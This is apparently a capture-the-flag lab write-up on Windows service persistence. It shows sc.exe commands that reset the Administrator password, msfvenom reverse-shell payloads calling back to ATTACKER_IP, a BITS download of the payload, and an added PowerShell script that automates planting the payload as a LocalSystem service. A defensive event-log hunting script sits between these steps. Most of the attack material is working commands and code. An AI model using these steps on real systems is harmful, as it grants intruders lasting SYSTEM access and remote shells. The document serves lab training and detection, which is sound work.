# Abusing Services

## <mark style="color:red;">Abusing Services</mark>

### <mark style="color:blue;">Creating backdoor services</mark>

**Create and start a service named "THMservice":**

```cmd
sc.exe create THMservice binPath= "net user Administrator Passwd123" start= auto
sc.exe start THMservice
```

> **Note:** There must be a space after each equal sign for the command to work.

The `net user` command runs when the service starts, resetting the Administrator's password to `Passwd123`. Because `sc.exe create` runs a service as LocalSystem unless told otherwise, the command executes with SYSTEM privileges. Notice that the service is set to start automatically (`start= auto`), so it runs at every boot without user interaction. Expect `sc.exe start` to report an error (typically 1053, a start timeout): `net.exe` is not a real service binary and never reports back to the Service Control Manager, but the command has already executed by then.

Resetting a user's password works well enough, but we can also create a reverse shell with **msfvenom** and associate it with the created service. Note, however, that service executables are special: they must register with the Service Control Manager (SCM) and report their status, otherwise the SCM treats the start as failed and ends the process after a timeout, leaving you with a short-lived shell at best. To create an executable that is compatible with Windows services, use the `exe-service` format in **msfvenom**:

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe
```

You can then copy the executable to the target system, for example into `C:\Windows`. Serve it from the attacker machine:

```bash
python3 -m http.server 80
```

and fetch it on the target (BITS accepts a directory as the destination and keeps the source file name):

```powershell
$Url  = "http://<ATTACKER_IP>/rev-svc.exe"
$Dest = "C:\Windows"
Start-BitsTransfer -Source $Url -Destination $Dest
```

Point the service's *binPath* to the backdoored service executable created with **msfvenom**:

```cmd
sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start THMservice2
```

Start a listener on the attacker machine first; starting the service should then create a connection back to it.

### <mark style="color:blue;">Modifying existing services</mark>

While creating new services works well for persistence, the blue team may monitor new service creation across the network (the System event log records every service installation). Reusing an existing service instead of creating one can avoid that. Usually any disabled service is a good candidate, as it can be altered without the user noticing.
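The check a defender would run against both techniques on this page, as an added example that is not part of the original page: it pulls new service installations (Event ID 7045) and start type changes (Event ID 7040) from the System log, and then checks the live service list, because changing only `binPath` does not produce a 7040 event. The lookback window and the "suspicious path" heuristics are my own assumptions; it needs an elevated session (or Event Log Readers membership) to read the System log.

```powershell
# Added example (not code from the original page): hunt for backdoored services.
# 7045 = a service was installed; 7040 = a service's start type changed.
# Assumes an elevated session; $LookbackHours and $SuspiciousImage are my own choices.
param([int]$LookbackHours = 24)

$since = (Get-Date).AddHours(-$LookbackHours)

# Image paths that look like a one-off command, an interpreter, a user-writable
# location, or an .exe dropped directly under \Windows (as in the text above)
$SuspiciousImage = 'cmd\.exe|powershell|pwsh|net1?\.exe|net user|rundll32|mshta|[wc]script|regsvr32|\\Users\\|\\Temp\\|\\ProgramData\\|^"?[A-Za-z]:\\Windows\\[^\\]+\.exe'

function Get-NewServiceInstalls {
    param([datetime]$Since)
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $Since } -ErrorAction SilentlyContinue |
      ForEach-Object {
        # EventData fields for 7045: ServiceName, ImagePath, ServiceType, StartType, AccountName
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time        = $_.TimeCreated
            ServiceName = $data['ServiceName']
            ImagePath   = $data['ImagePath']
            StartType   = $data['StartType']
            Account     = $data['AccountName']
            Suspicious  = [bool]($data['ImagePath'] -match $SuspiciousImage)
        }
      }
}

function Get-StartTypeChanges {
    param([datetime]$Since)
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7040; StartTime = $Since } -ErrorAction SilentlyContinue |
      ForEach-Object {
        # Message: "The start type of the <name> service was changed from <old> to <new>."
        if ($_.Message -match 'of the (.+?) service was changed from (.+?) to (.+?)\.') {
            $svc, $from, $to = $Matches[1], $Matches[2], $Matches[3]
            [pscustomobject]@{
                Time       = $_.TimeCreated
                Service    = $svc
                From       = $from
                To         = $to
                # a disabled or manual service flipped to auto start is the pattern used above
                Suspicious = ($to -like '*auto*')
            }
        }
      }
}

function Get-SuspiciousServiceConfigs {
    # Independent of the logs: any service whose *current* binary path matches the heuristics,
    # which also catches a reused service whose binPath was changed with sc.exe config
    Get-CimInstance Win32_Service |
      Where-Object { $_.PathName -match $SuspiciousImage } |
      Select-Object Name, State, StartMode, StartName, PathName
}

$installs = Get-NewServiceInstalls -Since $since
$changes  = Get-StartTypeChanges  -Since $since

"== Services installed in the last $LookbackHours h (suspicious first) =="
$installs | Sort-Object Suspicious -Descending |
  Format-Table Time, ServiceName, StartType, Account, ImagePath, Suspicious -AutoSize

"== Start type changes to auto start =="
$changes | Where-Object Suspicious | Format-Table -AutoSize

"== Services whose current binary path looks wrong =="
Get-SuspiciousServiceConfigs | Format-Table -AutoSize
```

Run it as `.\Find-ServiceBackdoors.ps1 -LookbackHours 72` (file name is mine). A service that shows up in the third table but in neither of the first two is the signature of the "modify an existing service" approach described below; to catch the `binPath` change itself at the time it happens you need registry value monitoring on `HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath` (for example Sysmon Event ID 13), which the built-in System log does not give you.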

**Get a list of all services, running and stopped (note the space after `state=`):**

```cmd
sc.exe query state= all
```

You should be able to find a `stopped service` called **THMService3**.

**Query the service's configuration:**

```cmd
C:\> sc.exe qc THMService3
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: THMService3
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2 AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\MyService\THMService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : THMService3
        DEPENDENCIES       : 
        SERVICE_START_NAME : NT AUTHORITY\Local Service
```

**There are three things we care about when using a service for persistence:**

* The executable (**BINARY\_PATH\_NAME**) should point to our payload.
* The service **START\_TYPE** should be `automatic` so that the payload runs without user interaction.
* The **SERVICE\_START\_NAME**, which is the account under which the service will run, should preferably be set to `LocalSystem` to gain SYSTEM privileges.

**Create a new reverse shell with msfvenom:**

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=5558 -f exe-service -o rev-svc2.exe
```

**To reconfigure THMService3, use the following command:**

```cmd
sc.exe config THMservice3 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"
```

* `binPath= "C:\Windows\rev-svc2.exe"`: sets the service's binary path to `C:\Windows\rev-svc2.exe`, so that executable is launched whenever the service is started.
* `start= auto`: sets the startup type to automatic, so the service starts when the system boots.
* `obj= "LocalSystem"`: sets the account the service runs under to LocalSystem, which gives the payload SYSTEM privileges. LocalSystem needs no password; if you ever point `obj=` at a user account instead, `sc.exe` also needs a `password=` argument.

You can then query the service's configuration again (`sc.exe qc THMService3`) to check that all three fields changed as expected.
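The same procedure scripted end to end, as an added example that is not code from the original page. It covers both sections above: it creates the service if it does not exist, or reconfigures an existing one (stopping it first and saving its old configuration for cleanup), then verifies the three fields the text calls out before starting it. It assumes an elevated PowerShell session on the target and that the payload (for example the `exe-service` binary built with msfvenom) is already on disk; the function names, `THMService3` and `C:\Windows\rev-svc2.exe` are lab placeholders.

```powershell
# Added example (not code from the original page): create or reconfigure a service to run a
# payload at boot, verify binary path / start type / account, start it, and optionally undo.
# Assumes an elevated session and that $PayloadPath already exists on the target.

function Get-ServiceConfig {
    param([Parameter(Mandatory)][string]$Name)
    # Win32_Service exposes the same fields that sc.exe qc prints
    Get-CimInstance Win32_Service -Filter "Name='$Name'" |
        Select-Object Name, State, StartMode, StartName, PathName
}

function Test-ServiceConfig {
    # Returns a list of mismatches; empty when the service is configured the way we want
    param([string]$Name, [string]$PayloadPath, [string]$Account)
    $cfg = Get-ServiceConfig -Name $Name
    if (-not $cfg) { return @("service $Name does not exist") }
    $problems = @()
    if ($cfg.PathName.Trim('"') -ne $PayloadPath) { $problems += "binary path is '$($cfg.PathName)'" }
    if ($cfg.StartMode -ne 'Auto')                { $problems += "start mode is $($cfg.StartMode)" }
    if ($cfg.StartName -ne $Account)              { $problems += "account is $($cfg.StartName)" }
    return $problems
}

function Install-ServicePayload {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$PayloadPath,
        [string]$Account = 'LocalSystem'   # SYSTEM; sc.exe create defaults to this as well
    )
    if (-not (Test-Path -LiteralPath $PayloadPath)) { throw "payload not found: $PayloadPath" }
    if ($PayloadPath -match '\s') { throw "use a path without spaces, or quote it for sc.exe yourself" }

    $original = Get-ServiceConfig -Name $Name
    if ($original) {
        # Reusing an existing (ideally stopped or disabled) service: stop it, keep the old config
        if ($original.State -ne 'Stopped') { Stop-Service -Name $Name -Force }
        # A space after each '=' is mandatory for sc.exe
        sc.exe config $Name binPath= $PayloadPath start= auto obj= $Account | Out-Null
    } else {
        sc.exe create $Name binPath= $PayloadPath start= auto obj= $Account | Out-Null
    }
    if ($LASTEXITCODE -ne 0) { throw "sc.exe failed with exit code $LASTEXITCODE" }

    $problems = Test-ServiceConfig -Name $Name -PayloadPath $PayloadPath -Account $Account
    if ($problems) { throw "service $Name is misconfigured: $($problems -join '; ')" }

    [pscustomobject]@{ Original = $original; Current = Get-ServiceConfig -Name $Name }
}

function Start-ServicePayload {
    param([Parameter(Mandatory)][string]$Name)
    # An exe-service binary registers with the SCM, so this returns cleanly. A plain command
    # (e.g. "net user ...") still executes, but the SCM reports a start failure because the
    # process never registers; report it and carry on.
    try { Start-Service -Name $Name -ErrorAction Stop }
    catch { Write-Warning "SCM reported: $($_.Exception.Message)" }
    (Get-ServiceConfig -Name $Name).State
}

function Restore-ServiceConfig {
    # Cleanup for a reused service. The old ImagePath is written back through the registry
    # because it may contain quotes and arguments that are awkward to pass through sc.exe.
    param([Parameter(Mandatory)]$Original)
    Stop-Service -Name $Original.Name -Force -ErrorAction SilentlyContinue
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$($Original.Name)" `
        -Name ImagePath -Value $Original.PathName
    $mode = @{ Auto = 'Automatic'; Manual = 'Manual'; Disabled = 'Disabled' }[$Original.StartMode]
    if ($mode) { Set-Service -Name $Original.Name -StartupType $mode }
    sc.exe config $Original.Name obj= $Original.StartName | Out-Null
}

# Usage (lab placeholders): reconfigure the stopped THMService3 from the text, then start it
$result = Install-ServicePayload -Name 'THMService3' -PayloadPath 'C:\Windows\rev-svc2.exe'
$result.Current | Format-List
Start-ServicePayload -Name 'THMService3'
# Later, to undo the change on a reused service: Restore-ServiceConfig -Original $result.Original
```

Start the listener before calling `Start-ServicePayload`. The verification step matters in practice: `sc.exe config` silently accepts a typo in the service name only as a failure exit code, and `obj=` with a user account (rather than LocalSystem) needs a `password=` argument, both of which show up as a mismatch from `Test-ServiceConfig` rather than as a shell that never arrives.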

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F176e1cmNOMnNgo8RIqC2%2Fimage.png?alt=media&#x26;token=a92a708d-08a2-4fa6-b80c-f8867464f973" alt=""><figcaption></figcaption></figure></div>

Start a listener on your attacker machine and manually start the service (`sc.exe start THMService3`) to receive a reverse shell.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FnE4ppydPSdATEfba0K8J%2Fimage.png?alt=media&#x26;token=ae8f14a3-bdb7-4b97-98bb-a216d90afa7a" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FE1Yp9x6GvTLKomUUVDEk%2Fimage.png?alt=media&#x26;token=4d9d6ed7-505a-4420-b86a-0720fc2d8e79" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F7EMYf6KLQjEiPiB2ixZG%2Fimage.png?alt=media&#x26;token=b4609543-58ce-4661-8fe2-e81067736541" alt=""><figcaption></figcaption></figure></div>
